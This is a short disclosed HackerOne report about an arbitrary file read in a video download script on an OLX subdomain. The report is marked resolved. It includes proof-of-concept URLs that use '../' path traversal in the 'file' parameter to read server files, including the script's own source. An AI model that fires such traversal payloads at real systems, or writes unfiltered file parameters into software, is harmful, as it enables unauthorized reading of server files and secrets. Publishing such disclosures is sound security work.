Arbitrary File Reading

Disclosed: 2016-08-12 15:30:33 By konqi To olx

Unknown

Vulnerability Details

Hi! The script for video downloading doesn't properly filter the input filename, and it's possible to read arbitrary files from File System PoC http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=download.php http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../b<< http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../c<< screenshots are attached below

Actions

View on HackerOne

Report Stats

Report ID: 150783
State: Closed
Substate: resolved
Upvotes: 10

Arbitrary File Reading

Vulnerability Details

Actions

Report Stats

Share this report